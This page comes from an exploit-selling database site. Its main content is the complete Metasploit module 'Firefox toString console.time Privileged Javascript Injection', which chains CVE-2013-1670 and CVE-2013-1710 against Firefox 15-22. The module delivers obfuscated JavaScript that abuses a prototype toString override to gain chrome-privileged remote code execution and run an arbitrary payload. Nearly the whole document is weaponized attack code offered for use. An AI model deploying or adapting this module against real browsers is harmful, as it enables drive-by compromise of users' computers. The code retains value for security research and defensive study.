0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Firefox toString console.time Privileged Javascript Injection Exploit
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/exploitation/jsobfu'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
autopwn_info({
:ua_name => HttpClients::FF,
:ua_minver => "15.0",
:ua_maxver => "22.0",
:javascript => true,
:rank => ExcellentRanking
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox toString console.time Privileged Javascript Injection',
'Description' => %q{
This exploit gains remote code execution on Firefox 15-22 by abusing two separate
Javascript-related vulnerabilities to ultimately inject malicious Javascript code
into a context running with chrome:// privileges.
},
'License' => MSF_LICENSE,
'Author' => [
'moz_bug_r_a4', # discovered CVE-2013-1710
'Cody Crews', # discovered CVE-2013-1670
'joev' # metasploit module
],
'DisclosureDate' => "May 14 2013",
'References' => [
['CVE', '2013-1670'], # privileged access for content-level constructor
['CVE', '2013-1710'] # further chrome injection
],
'Targets' => [
[
'Universal (Javascript XPCOM Shell)', {
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
}
],
[
'Native Payload', {
'Platform' => %w{ java linux osx solaris win },
'Arch' => ARCH_ALL
}
]
],
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => lambda { |ver| ver.to_i.between?(15, 22) }
}
))
register_options([
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
], self.class)
end
def on_request_exploit(cli, request, target_info)
send_response_html(cli, generate_html(target_info))
end
def generate_html(target_info)
key = Rex::Text.rand_text_alpha(5 + rand(12))
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
js = Rex::Exploitation::JSObfu.new(%Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
var y = {}, q = false;
y.constructor.prototype.toString=function() {
if (q) return;
q = true;
crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
return 5;
};
console.time(y);
|)
js.obfuscate
%Q|
<!doctype html>
<html>
<body>
<script>
#{js}
</script>
#{datastore['CONTENT']}
</body>
</html>
|
end
end
# 0day.today [2024-11-14] #